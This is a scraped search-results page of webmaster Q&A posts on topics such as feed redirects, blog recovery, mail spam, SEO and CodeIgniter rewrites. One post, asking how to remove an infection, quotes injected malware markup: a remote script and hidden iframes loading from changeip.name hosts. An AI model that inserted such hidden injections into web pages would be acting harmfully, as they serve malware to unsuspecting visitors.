Search Results

Search found 9728 results on 390 pages for 'meysam pro'.


  • 301 redirecting a blog's RSS feed URL?

    - by Marc Charbonneau
    I moved my personal blog from WordPress to Ghost this weekend, which changes the RSS feed URL from /feed/ to /rss/. By default Ghost returns a 301 redirect for /feed/, which I've verified by checking the response header and looking at the logs. In Feedly, though, new posts aren't being picked up (at least not after 24 hours; I'm not sure if there's a waiting period before the URL is updated). What's the correct thing to do in this situation? Do I need to keep /feed/ alive instead of returning a 301? If so, is there a rewrite rule that would let me do this in nginx instead of having to modify the Ghost source code?
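    A 301 is normally the right answer and feed readers are expected to follow it eventually, but if you decide to keep /feed/ serving content, it can be handled entirely in nginx. A minimal sketch, assuming Ghost is proxied on 127.0.0.1:2368 (its default port); adjust to match your actual server block:

      # inside the server { } block for the blog
      location = /feed/ {
          # serve the feed content at the old URL instead of redirecting
          proxy_pass http://127.0.0.1:2368/rss/;
      }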

    Read the article

  • What are some good services for brainstorming domain name ideas? [closed]

    - by Clay Nichols
    Possible Duplicate: Is there a domain search tool on the web that works well? I've run across a few of these but can't remember them right now (and I've probably missed a few good ones). The idea is that you provide some input (a word or words) and the service comes up with synonyms, rhyming words, etc. Ideally, I'd want some confidence that they aren't just registering all the domains I come up with.

    Read the article

  • Recovering a lost website with no backup?

    - by Jeff Atwood
    Unfortunately, our hosting provider experienced 100% data loss, so I've lost all content for two hosted blog websites: http://blog.stackoverflow.com http://www.codinghorror.com (Yes, yes, I absolutely should have done complete offsite backups. Unfortunately, all my backups were on the server itself. So save the lecture; you're 100% absolutely right, but that doesn't help me at the moment. Let's stay focused on the question here!) I am beginning the slow, painful process of recovering the website from web crawler caches. There are a few automated tools for recovering a website from internet web spider (Yahoo, Bing, Google, etc.) caches, like Warrick, but I had some bad results using this: My IP address was quickly banned from Google for using it I get lots of 500 and 503 errors and "waiting 5 minutes…" Ultimately, I can recover the text content faster by hand I've had much better luck by using a list of all blog posts, clicking through to the Google cache and saving each individual file as HTML. While there are a lot of blog posts, there aren't that many, and I figure I deserve some self-flagellation for not having a better backup strategy. Anyway, the important thing is that I've had good luck getting the blog post text this way, and I am definitely able to get the text of the web pages out of the Internet caches. Based on what I've done so far, I am confident I can recover all the lost blog post text and comments. However, the images that go with each blog post are proving…more difficult. Any general tips for recovering website pages from Internet caches, and in particular, places to recover archived images from website pages? (And, again, please, no backup lectures. You're totally, completely, utterly right! But being right isn't solving my immediate problem… Unless you have a time machine…)
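    Besides search engine caches, the Internet Archive's Wayback Machine often has full snapshots, images included, and it exposes a simple availability API for checking what it holds. A minimal sketch in Python (the post URL is only a placeholder):

      import requests

      # ask the Wayback Machine for its closest snapshot of a given page
      resp = requests.get("http://archive.org/wayback/available",
                          params={"url": "http://www.codinghorror.com/blog/archives/some-post.html"})
      snapshot = resp.json().get("archived_snapshots", {}).get("closest")
      if snapshot:
          print(snapshot["url"], snapshot["timestamp"])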

    Read the article

  • Why not AJAX'ify entire websites?

    - by Anonymous -
    Is there any solid reasoning as to why sites shouldn't be developed with AJAX functionality that loads the major parts of each page (assuming there are elements like the header, navigation, etc. that remain the same)? Surely it would be less resource-intensive, since the server wouldn't have to serve content that appears on every page, benefiting both the host and the end user. Answer the question taking into consideration that the site's JavaScript behaviour degrades gracefully in every instance. I'm talking about new sites where this behaviour could be implemented right from the off, so it doesn't technically cost any money; we're not returning to a finished product to implement it.
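    The usual way to get the benefit without giving anything up is progressive enhancement: real links that work on their own, with JavaScript layered on top to fetch only the content area. A minimal jQuery sketch, assuming a hypothetical #content container and a data-ajax-nav marker on internal links:

      // intercept marked internal links and swap only the content area
      $(document).on('click', 'a[data-ajax-nav]', function (e) {
          e.preventDefault();
          var url = $(this).attr('href');
          // load the remote page and keep just its #content children
          $('#content').load(url + ' #content > *', function () {
              if (window.history && history.pushState) {
                  history.pushState(null, '', url); // keep the address bar and history usable
              }
          });
      });

    Without JavaScript (or for crawlers) the plain href navigation still works, which is what "degrades gracefully" buys you.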

    Read the article

  • I'm using a shared server, and as such Gmail marks my email as spam (all from headers are different from the same IP)

    - by chipperyman573
    I have a shared server, meaning many people share the same IP. When I send an email, the domain after the @ is different from that of someone else who shares the same IP with me, and Gmail marks it as spam. For example: My website's IP is 1.2.3.4. My website is mywebsite.com. Person 2's website is hosted by the same host, so their IP is also 1.2.3.4. Person 2's website is person2.com. When they send an email, it gets sent from [email protected]. When I send an email, it gets sent from [email protected]. According to Gmail's bulk sender guidelines: "Use the same address in the 'From:' header on every bulk mail you send." Again, the only similarity between our websites is the IP. However, this causes Gmail to mark both our mail as spam. Is there a way to sort this out with Gmail?
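    One thing that usually helps here is publishing sender authentication records (SPF, and DKIM if the host supports it), so Gmail can tie mail from the shared IP to your specific domain rather than judging the IP alone. A minimal SPF sketch as a DNS TXT record, reusing the placeholder IP from above:

      mywebsite.com.   IN TXT   "v=spf1 a mx ip4:1.2.3.4 ~all"

    This says mail for mywebsite.com may legitimately come from the domain's A/MX hosts and from 1.2.3.4; person2.com would publish its own record, so the shared IP stops being the only signal Gmail has.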

    Read the article

  • Duplicate Content Problem due to plugin

    - by Amar Ryder
    I am running a WordPress website, 'example', on which I have installed the Transposh plugin. Unfortunately, despite English being the default language and therefore available at example.com/xxx, Google is indexing example.com/en/xxx as well, so I now have a duplicate content problem. I want to remove this plugin and get the /en/ links out of Google so that my content is left without duplicate pages. Do you have a solution for doing this safely? My own thought is to remove the plugin from the website; this will create 404 errors for the links Google has indexed, but I can add redirect code in .htaccess until Google drops the example.com/en/xxx URLs. If you know any other, healthier way to handle this, please help me!
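    Redirecting rather than letting the old URLs 404 is the gentler option, since a 301 passes visitors and link value to the canonical page while Google re-crawls. A minimal .htaccess sketch, assuming Transposh only added the /en/ prefix (place it above the standard WordPress rules and adjust if other language prefixes exist):

      RewriteEngine On
      # send the duplicate English URLs back to the canonical ones
      RewriteRule ^en/(.*)$ /$1 [R=301,L]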

    Read the article

  • How to get users to commit and collaborate to make a website valuable? [closed]

    - by AzizAG
    I own a website that requires a fairly large number of users to collaborate and commit occasionally to make the website valuable; basically, the website can't be valuable without users helping me put content on it. To avoid confusion: I'm thinking of websites like Wikipedia, Stack Exchange and Yahoo! Answers, where most of the content is based on peer effort. How do they actually get users interested and committed in the first place? What are the things I have to do to get users involved in the website and actually help me grow it bigger?

    Read the article

  • How to remove this malware

    - by muratto12
    Some files on my site contain some extra lines. After I delete them manually, I find them corrupted again some time later. It all comes from http://*.changeip.name/ via some JS files. How can I remove them? <!--pizda--><script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script><!--/pizda--> <iframe src=http://pizda.changeip.name/?f=1065433 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>

    Read the article

  • How to save a PNG as a smaller file but with the same resolution?

    - by Radek
    Not sure which Stack Exchange site is the best for this question. I have a scanned JPG file with the properties below and a size of 8.5 MB: pixel dimensions 2468 × 3484 pixels, print size 208.96 × 294.98 millimeters, resolution 300 × 300 ppi. I need to save the file as a PNG while keeping the file size under 4 MB. Most importantly, the size of the picture must remain the same; I mean that the object size in the picture must stay the same. Could anybody tell me what is used to define the size of the objects in the picture?
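    The printed object size is determined by the pixel dimensions together with the ppi (2468 px ÷ 300 ppi ≈ 208.96 mm), so as long as both are preserved the objects keep their size; only the colour depth or compression needs to change to shrink the file. A minimal sketch using Python with Pillow, assuming the scan is scan.jpg:

      from PIL import Image

      img = Image.open("scan.jpg")          # 2468 x 3484 pixels, untouched below
      # reducing 24-bit colour to an 8-bit palette is what shrinks the PNG file
      img = img.quantize(colors=256)
      # keep 300 ppi so the print size stays 208.96 x 294.98 mm
      img.save("scan.png", optimize=True, dpi=(300, 300))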

    Read the article

  • Lost Traffic from Google Because of Meta-tag Adding

    - by Marian
    I have a site, aroundnails.com. It has an English version on the subdomain en.aroundnails.com. After reading about language-related meta tags for Google, I placed such a tag on the main page of the main site: <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" /> In this way I tried to tell Google that my site at en.aroundnails.com is the English version of the main site, not a duplicate. After a fortnight I lost a huge part of my traffic from Google, more than half. At the beginning of September I removed this tag, but traffic remained at the same level. I hope somebody can help me solve this issue.
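    For hreflang annotations Google expects the pages to reference each other (and themselves), with one entry per language version on every page; a lone hreflang="en" tag on the main page only tells half the story. A minimal sketch, assuming the main site is in Russian (swap in the actual language code):

      <!-- the same pair of tags goes on http://aroundnails.com/ and on http://en.aroundnails.com/ -->
      <link rel="alternate" hreflang="ru" href="http://aroundnails.com/" />
      <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" />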

    Read the article

  • Page Titles - Including gender of a fashion product in page titles?

    - by Cedric
    I need a bit of help deciding whether it is worth including gender in page titles. In Webmaster Tools I looked at our search queries that include "women", and they account for 9% of our total search queries for the site. I am wondering whether this is the right way to assess the benefit of including "women" or "men" in page titles, given that it only looks at results already pointing to us. Is there another tool where I can check queries that may not include us in the search results? Maybe Google Insights? http://www.google.com/insights/search/#q=shoes%2Cshoes%20for%20women&cmpt=q It looks like 1.1% of searches for "shoes" are also for "shoes for women"; is that correct? As a direct comparison, doing the same analysis on our own search queries, I get 1.8% when comparing "shoes for women" to "shoes". Implementing this automation would probably affect 99% of our site, if not more, splitting it into two segments (one portion of page titles including "women" and the other including "men"). Will doing so create a massively repetitive keyword throughout the site, hurting SEO? http://support.google.com/webmasters/bin/answer.py?hl=en&answer=35624 (see "Avoid repeated or boilerplate titles.")

    Read the article

  • How long does it take for Google to re-index pages or update the link titles?

    - by ElHaix
    On one of our classified sites, when doing site:[mysite.com] in Google, the link text is simply [product name] - [mysite.com], whereas it should read [product name] classifieds for sale in... I suspect that the sitemap may have been submitted when we just had [product name], and the page titles were updated later. However, it has been a couple of weeks since I confirmed the longer page titles, and they still appear shortened in organic results. How can I get this looking right in Google's organic results?

    Read the article

  • .htaccess does not work without index.php on CodeIgniter

    - by Mattia
    I have read a lot of topics about the same problem, but I cannot find the solution. I have a LAMP stack on an Ubuntu server. My document root is /home/utente/; inside this directory I have another directory (turni) with a CodeIgniter web app. The web app works fine with index.php in the URL, but I want to eliminate it. I have this configuration:

    config.php in CodeIgniter:

      $config['index_page'] = '';

    .htaccess:

      RewriteEngine On
      RewriteBase /
      RewriteCond %{REQUEST_URI} ^system.*
      RewriteRule ^(.*)$ /index.php?/$1 [L]
      RewriteCond %{REQUEST_URI} ^application.*
      RewriteRule ^(.*)$ /index.php?/$1 [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule ^(.*)$ index.php?/$1 [L]

    /etc/apache2/sites-available/default:

      <VirtualHost *:80>
          ServerAdmin webmaster@localhost
          DocumentRoot /home/utente
          <Directory />
              Options FollowSymLinks
              AllowOverride None
          </Directory>
          <Directory /home/utente/>
              Options Indexes FollowSymLinks MultiViews
              AllowOverride None
              Order allow,deny
              allow from all
          </Directory>
          ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
          <Directory "/usr/lib/cgi-bin">
              AllowOverride None
              Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
              Order allow,deny
              Allow from all
          </Directory>
          ErrorLog ${APACHE_LOG_DIR}/error.log
          # Possible values include: debug, info, notice, warn, error, crit, alert, emerg.
          LogLevel warn
          CustomLog ${APACHE_LOG_DIR}/access.log combined
          Alias /doc/ "/usr/share/doc/"
          <Directory "/usr/share/doc/">
              Options Indexes MultiViews FollowSymLinks
              AllowOverride None
              Order deny,allow
              Deny from all
              Allow from 127.0.0.0/255.0.0.0 ::1/128
          </Directory>
      </VirtualHost>

    When I open a link of the web app without index.php in the URL, the server shows me this error: The requested URL /turni/auth/login was not found on this server. Why? If I put index.php back, like /turni/index.php/auth/login, everything works fine.
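    One likely culprit, given the config above: the <Directory /home/utente/> block has AllowOverride None, which makes Apache ignore the .htaccess entirely, so the rewrite rules never run. A sketch of the change (assuming mod_rewrite is enabled, e.g. via a2enmod rewrite, and Apache is reloaded afterwards); since the app lives in the /turni subdirectory, the RewriteBase may also need to be /turni/:

      <Directory /home/utente/>
          Options Indexes FollowSymLinks MultiViews
          # let the CodeIgniter .htaccess take effect
          AllowOverride All
          Order allow,deny
          allow from all
      </Directory>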

    Read the article

  • Streaming audio from a webpage

    - by luca590
    I want to be able to stream audio from another webpage through mine, but I do not know how to find the URL for each audio file located on the other page. It would also be extremely helpful to do everything in bulk, so that instead of writing a separate line of code for each audio file, I could write a few lines of code to add links to 100 audio files, etc. I am using Ruby on Rails for my webpage. How do you find a file located on a separate webpage? Does anyone know if it is possible, and how, to collect file links in bulk?
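    Audio file URLs are just attributes in the remote page's HTML (href on links, src on audio/source tags), so the bulk approach is to fetch the page and collect them with an HTML parser; in Rails the natural tool is Nokogiri, but here is a minimal sketch of the idea in Python, with a placeholder URL (and check that you have permission to use the files):

      import requests
      from bs4 import BeautifulSoup
      from urllib.parse import urljoin

      page_url = "http://example.com/music"   # placeholder: the page you want to scan
      soup = BeautifulSoup(requests.get(page_url).text, "html.parser")

      audio_urls = set()
      for a in soup.find_all("a", href=True):                    # direct links to files
          if a["href"].lower().endswith((".mp3", ".ogg", ".wav")):
              audio_urls.add(urljoin(page_url, a["href"]))
      for tag in soup.find_all(["audio", "source"], src=True):   # embedded players
          audio_urls.add(urljoin(page_url, tag["src"]))

      print(sorted(audio_urls))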

    Read the article

  • Weird unexpected image compression on a web server running Apache on Ubuntu?

    - by Billy Bob Thornton
    I have a weird problem on my production web server running Apache on Ubuntu: it compresses my images, thereby dramatically lowering their quality! Actually I have two virtual hosts running, each located in a different folder. Whether I display .gif images by navigating the two sites or access them directly by their URL, their size and quality are invariably degraded. I tried with three different browsers: same problem. Using them on other sites on the Web: no problem. Of course I disabled mod_deflate on the server (which should not compress images anyway), but the phenomenon remains. On my local development server, running the same configuration, everything is OK. Now I'm completely lost! For the record, my configuration: Ubuntu 10.04, Apache 2, PHP 5.

    Read the article

  • A record DNS, nameserver help

    - by Josip Gòdly Zirdum
    I just installed Kloxo on my VPS and I want to link my domain to that server, which it sort of already is: I made it connect via an A record. That works, in that the IP points to my server, but how do I make a website using it? I tried adding the domain but this doesn't work. I feel I'm not explaining this well. On my server it asked me to create a DNS template, so I did, and I created the nameservers ns1.mydomain.com and ns2.mydomain.com. Then I added the domain mydomain.com to the panel. I go to the folder it creates for it, but no matter what file is there it won't work. Any ideas? Is there a way to possibly not add a domain to Kloxo at all and just treat the IP of the server as the domain, since the A record points there anyway? I don't intend to host another website on the server anyway.

    Read the article

  • Which is preferable: creating dedicated domains for mobile apps that share different content, or associating them with folders in one domain?

    - by Abdullah Al-Khalidi
    I want to consult you on an SEO matter with which I am completely lost. I've built a social mobile application that allows users to share text content, and I made all the content that appears in the application available via the web through dedicated links; however, those links cannot be navigated to through the website, as they are only generated when users share content through the app to social media networks. I've implemented this method on three applications with totally different content, and I've directed all generated URLs to come from the main company website, which is http://frootapps.com, so when a user shares something, the URL looks like http://frootapps.com/qareeb/share.aspx?data=127311. My question: which is preferable, a dedicated website for each app that uses such a method, or is it OK to keep doing it the way I am doing it now?

    Read the article

  • How should I deal with user agent parsing in logs?

    - by Mr. Jefferson
    My web app project includes logging functionality so we can see where visitors are coming from (referrer URL), what the popular user agents are, what pages are most popular, etc. The log is stored in SQL Server, and when I query the user agents I use a large (almost 100 lines) and growing CASE statement to separate the user agents using string matching (i.e. if the user agent contains the string "Firefox/9" then it's Firefox 9). Is there a better way to do this, so I don't have to continually add to that CASE statement to deal with new browser releases? Also, how should I deal with less common, weird/unknown user agents? I've seen the following in the logs and been unable to find good information online about what they are: WordPress/3.3.1; http://www.facecolony.org Mozilla/4.0 ( http://www.hairirons.org redips; <a href=http://hairirons.org/>chi hair iron</a>) I'd guess they're bots/crawlers, but the sites they point to don't appear to reference web crawlers (or even be available sometimes). I've seen other user agents that aren't familiar to me, but I know they're bots because they include "bot" or "spider" or something similar in them.
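    One way out of the ever-growing CASE statement is to classify user agents in application code with a maintained parsing library before (or instead of) doing it in SQL. A minimal sketch using Python with the third-party user-agents package (an assumption; an equivalent library for your app's own language would work the same way):

      from user_agents import parse  # pip install user-agents

      ua = parse("Mozilla/5.0 (Windows NT 6.1; rv:9.0) Gecko/20100101 Firefox/9.0")
      print(ua.browser.family, ua.browser.version_string)  # Firefox 9.0
      print(ua.is_bot)                                     # False for normal browsers

    The library's regex database is maintained by the community as new browsers and crawlers appear, so unknown and bot-style strings get a sensible classification without hand-written rules.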

    Read the article

  • Daily Blog Archives and Duplicate Content

    - by nemmy
    A few weeks back I realised that my blog software was creating daily post archives, which basically resulted in duplicate content, especially if I only had one post a day. The situation is something like this: www.sitename.com/blog/archives/2013/06/01 - daily archive for 1 June 2013 www.sitename.com/blog/archives/2013/06/my-post-name.html So here we have two pages that are basically identical, except the daily archive has some meaningless title like "Daily Archive for 1 June 2013". And I have no control over which content Google decides is the primary content. It's quite possible (and likely) that the daily archive could be the "primary" content and the actual post itself the "duplicate". Once I realised it was doing this I modified the daily archive template to include <meta name="robots" content="noindex"> Here we are a few weeks later and I still see some daily archives coming up in Google search results. I realise some of those deep pages might not be crawled yet, but I am worried that the original post (which should be the primary content) has been marked duplicate content by Google. Now that I've noindexed the daily archives, I might end up with no indexed content AND the original articles still flagged as duplicates, and nothing will show up in search at all. Have I screwed myself here or is there a way out?
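    A complementary safeguard is a self-referencing rel=canonical on each post, which tells Google explicitly which URL is the primary one even if an archive page duplicates its text. A sketch for the head of the post template, using the example URL above:

      <link rel="canonical" href="http://www.sitename.com/blog/archives/2013/06/my-post-name.html" />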

    Read the article

  • How to set up a web hosting site?

    - by Thomas John
    Hi all, I have purchased a cPanel/WHM web hosting reseller account and I want to set up a site where people can sign up for hosting accounts. I would also like to have a domain name registration system on the site, so people can register the domain name they would like to host with me. How can I do this? Are there any ready-made scripts available, or should I create my own script using the WHM API? Thanks a lot.

    Read the article

  • Good free CSS Sprite for icons

    - by Saif Bechan
    I am working on a small project where I need some of the basic icons: edit, favorite, delete. You know them. Now I can download them all separately and put them together in a sprite, but I was wondering if there are ready-to-download sprites which I can use. I am working on an accounting app, so it would be nice if the icons were not too childish. A little bit of fancy, business-type icons. Thanks
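    Whichever sprite sheet you end up with, using it works the same everywhere: one background image, shifted per icon with background-position. A minimal CSS sketch, assuming a hypothetical icons.png with 16 x 16 icons laid out side by side:

      .icon {
          display: inline-block;
          width: 16px;
          height: 16px;
          background: url('icons.png') no-repeat;
      }
      .icon-edit     { background-position: 0 0; }      /* first icon in the sheet */
      .icon-delete   { background-position: -16px 0; }  /* second icon */
      .icon-favorite { background-position: -32px 0; }  /* third icon */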

    Read the article

  • jQuery Mobile list view is not working after adding some jQuery code [closed]

    - by Kaidul Islam Sazal
    I am using jQuery Mobile, and I have an array makeArray in jQuery from which I have created a few list views. Everything works fine, but the jQuery Mobile list-view style is not applied; an ordinary list is shown instead. This is my code:

      $(document).ready(function(){
          var url = "inventory/inventory.json";
          var makeArray = new Array();
          $.getJSON(url, function(data){
              $.each(data, function(index, item){
                  if(($.inArray(item.make, makeArray)) == -1){
                      makeArray.push(item.make);
                      $('.upper_case')
                          .append('<li data-icon="list-arrow"> <a href="trade_form.php?='+ item.make +'"><img src="images/car_logo/buick.png" class="ui-li-thumb"/>' + item.make + '</a></li>');
                  }
              });
          });
      });
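    jQuery Mobile enhances list views when the page is first created, so items appended later from an AJAX callback stay unstyled until the widget is told about them. A sketch of the usual fix, calling listview('refresh') after the loop (assuming .upper_case is the listview element itself):

      $.getJSON(url, function(data){
          $.each(data, function(index, item){
              // ... existing append logic ...
          });
          // re-apply jQuery Mobile styling to the newly added <li> elements
          $('.upper_case').listview('refresh');
      });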

    Read the article

  • Finding terms surrounding a trending hashtag?

    - by aendrew
    I'm looking for a way to find "sub-trends", or words that are trending beneath a larger trend. For instance, say "#foo" is the hashtag for a conference. Searching for "#foo" only gives you a general overview of what people are talking about; if "#foo" moves too quickly, it becomes really difficult to track disparate conversations at #foo. If "#bar" and "#abc" are two different sessions at "#foo", one can find more specific information by searching for "#foo #bar" or "#foo #abc"; yet how would one find out about the existence of these surrounding hashtags, i.e., sub-trends? If you look at the screenshot for Peoplebrowsr, there's a panel that looks for "words surrounding [trend]," which seems to be exactly what I'm looking for. Is there a way to accomplish this more simply, i.e., without paying $149/mo. for Peoplebrowsr? Thanks! Update: Another service that can do this is Twazzup (click for example). The "Community" panel has some limited info on surrounding words; is there a tool that does this, but with more detail?
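    If no hosted tool fits, the underlying computation is just co-occurrence counting over whatever batch of matching tweets you already collect. A minimal sketch in Python (the sample tweets are placeholders):

      import re
      from collections import Counter

      def surrounding_hashtags(tweets, main_tag="#foo", top_n=10):
          """Count hashtags that co-occur with the main tag across a batch of tweet texts."""
          counts = Counter()
          for text in tweets:
              tags = set(re.findall(r"#\w+", text.lower()))
              if main_tag in tags:
                  counts.update(tags - {main_tag})
          return counts.most_common(top_n)

      print(surrounding_hashtags(["Great keynote #foo #bar", "#foo #abc room is packed"]))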

    Read the article

  • Groups page is blank in SharePoint 2010 [migrated]

    - by Murali Ramakrishnan
    Sometimes it's very confusing how SharePoint 2010 group creation works. Here's a scenario we have been facing for a long time with groups in SharePoint 2010. We had a requirement to create two custom groups and then create a custom site, all programmatically. For the most part the scenario works as expected, but in roughly one out of a hundred site creations the group creation goes wrong: we are still able to access the group and the users associated with it programmatically, but from the UI, if you try to access that specific group's page from the site permissions page, SharePoint returns a BLANK WHITE page; nothing else. Is this a SharePoint 2010 issue, or has anybody had this problem and fixed it? Kindly share your thoughts.

    Read the article

  • Privacy policy and terms of use language

    - by L. De Leo
    I have a Czech-registered business with which I'm serving a web app mostly (but not exclusively) targeted at Italian customers. The server is in Amsterdam. The site will be multilingual (with 4 languages supported), but for now it's Italian only. What language should the privacy policy and the terms and conditions be in? What law should they refer to? Could I just offer these two docs in English? (Easier to write and to maintain.)

    Read the article
